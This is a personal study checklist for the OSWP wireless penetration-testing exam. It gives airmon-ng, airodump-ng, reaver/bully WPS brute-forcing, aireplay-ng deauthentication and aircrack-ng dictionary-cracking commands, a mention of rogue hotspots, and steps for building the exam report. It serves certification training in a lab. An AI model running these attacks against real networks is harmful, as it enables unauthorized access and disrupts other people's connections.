OSWP

Offensive Security Wireless Professional

## System Prerequisites

- Make sure to have a webcam.
- Update all drivers beforehand so that screen sharing works for proctoring.
- Make sure to have a quiet environment with a stable internet connection.
- Have either a Kali VM or a bare-metal Kali install prepared.


## Preliminary: Connect to Test Environment (5 minutes)

**Commands:**

```bash
# The archive is bzip2-compressed, so extract with -j (-z is for gzip)
tar xjvf exam-connection.tar.bz2
sudo openvpn OS-XXXXXX-OSWP.ovpn
```

**Credentials:** Add username and password from email.


## Strategy

Use the tools on the Kali machine they provide.


---


### 1. Environment Setup (5 minutes)

**Command:**

```bash
sudo airmon-ng
```

**Screenshot:** List of available wireless interfaces.


---


### 2. Monitoring Mode (5 minutes)

**Command:**

```bash
sudo airmon-ng start wlan1
```

**Screenshot:** Confirm monitoring mode.


---


### 3. Scanning Networks (5 minutes)

**Command:**

```bash
sudo airodump-ng wlan1mon
```

**Screenshot:** All visible networks.


#### Fine-Tuning (5 minutes)

**Command:**

```bash
sudo airodump-ng wlan1mon -c [Channel] -w ssid
```

**Screenshot:** Refined search.


---


### 4. The Hack (40 minutes)

#### WPS (20 minutes)

**Commands:**

```bash
sudo reaver -i wlan1mon -b [BSSID] -vv
sudo bully wlan1mon -b [BSSID] -c [Channel] --force
```

**Screenshot:** Cracked WPS PIN and WPA key.


#### WPA/WPA2-PSK (20 minutes)

**Command:**

```bash
sudo aireplay-ng -0 6 -a [BSSID] wlan1mon
```

**Screenshot:** Deauthentication packets.


#### WPA-MGT (20 minutes)

Make a rogue hotspot.

Use a different `host.conf` file depending on the authentication method:

- PEAP
- MSCHAP
- EAP

---


### 5. The Capture (10 minutes)

**Screenshot:** Handshake or sufficient data.


---


### 6. The Crack (20 minutes)

**Command:**

```bash
# Kali keeps its wordlists under /usr/share/wordlists
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt hash.txt
```

**Screenshot:** Cracked password.


---


### 7. Connect to Cracked Network (10 minutes)

**For WEP:**

```bash
sudo iwconfig wlan0 essid [ESSID] key [WEP Key]
sudo dhclient wlan0
```


**For WPA/WPA2:**

```bash
sudo wpa_supplicant -i wlan0 -c wpa_supplicant.conf -B
sudo dhclient wlan0
```


**Screenshot:** Successful connection.


---


### 8. The Flag (5 minutes)

**Access Proof:** `http://192.168.1.1/proof.txt`


**Screenshot:** Proof.


---


### 9.1 Exporting Obsidian Notes for Report (5 minutes)

**Export Notes**: In Obsidian, go to the note you want to export, click on the three-dot menu, and choose `Export → Export as Markdown (.md)`.


---


### 9.2 Generating the Final Report Using OSCP Exam Report Generator (10 minutes)

**Clone Repository**: 

```bash
git clone https://github.com/initinfosec/OSCP-Exam-Report-Template-Markdown.git
```


**Install Required Software and Template**: 

```bash
./setup.sh
```


**Copy Markdown Report**: Paste your exported Obsidian notes into the template, below the header.


**Generate PDF and Archive**: 

```bash
ruby generate.rb
```


**Manual Verification**: Check PDF and 7z archive for accuracy.


---


## Final Reporting and Submission (15 minutes)

**7z Archiving:**

```bash
7z a -t7z OSWP-XXXXXX-Exam-Report.7z OSWP-XXXXXX-Exam-Report.pdf
```


**Upload:**

- Upload at `https://upload.offsec.com`.

- Verify the MD5 hash.


**Confirmation:** Check email for upload success.
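
A pre-upload check for the archiving and MD5 steps above, as an added example that is not part of the original notes: it confirms the archive follows the `OSWP-XXXXXX-Exam-Report.7z` naming, starts with the 7z file signature, and matches the MD5 shown after upload. The function name, its return codes, and passing the portal's hash as the second argument are assumptions.

```bash
#!/usr/bin/env bash
# Added example: sanity-check the report archive before and after upload.
# Assumed interface: check_report_archive <archive> <md5 shown by upload page>
# Returns: 0 match, 1 MD5 mismatch, 2 bad name, 3 missing/empty, 4 not a 7z file

check_report_archive() {
    local archive portal_md5 base magic local_md5
    archive="$1"
    portal_md5="$2"

    base="$(basename "$archive")"
    # Naming pattern taken from the notes: OSWP-XXXXXX-Exam-Report.7z
    case "$base" in
        OSWP-?*-Exam-Report.7z) ;;
        *) echo "bad name: $base" >&2; return 2 ;;
    esac

    [ -s "$archive" ] || { echo "missing or empty: $archive" >&2; return 3; }

    # Every 7z archive begins with the bytes 37 7A BC AF 27 1C.
    magic="$(head -c 6 < "$archive" | od -An -tx1 | tr -d ' \n')"
    [ "$magic" = "377abcaf271c" ] || { echo "not a 7z archive" >&2; return 4; }

    local_md5="$(md5sum < "$archive" | cut -d' ' -f1)"
    # Normalise case and stray whitespace from a copy-pasted value.
    portal_md5="$(printf '%s' "$portal_md5" | tr -d '[:space:]' | tr 'A-F' 'a-f')"

    if [ "$local_md5" = "$portal_md5" ]; then
        echo "MD5 match: $local_md5"
        return 0
    fi
    echo "MD5 MISMATCH local=$local_md5 portal=$portal_md5" >&2
    return 1
}
```

A mismatch (return code 1) means the uploaded file differs from the local archive, so re-upload before the submission window closes.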

## Old Edits

Prep notes for the exam

**Getting set up**

**The Hack**

Two major components of Wi-Fi hacking

**The Crack**

```bash
aircrack-ng -w /usr/share/wordlists/rockyou.txt hash.txt
```

**The Flag**

Go to `http://192.168.1.1/proof.txt`

---


**Refined version**

1. Environment Setup
2. Monitoring Mode
3. Scanning Networks
4. WEP Cracking
   - Capture Data Packets
   - ARP Replay Attack
   - Crack WEP Key
5. WPA/WPA2 Cracking
   - Capture Handshake
   - Deauthenticate Client
   - Dictionary Attack
6. Connecting to Cracked Networks
7. Final Reporting

Focus on these aspects and practice as much as possible to be well-prepared for the OSWP exam.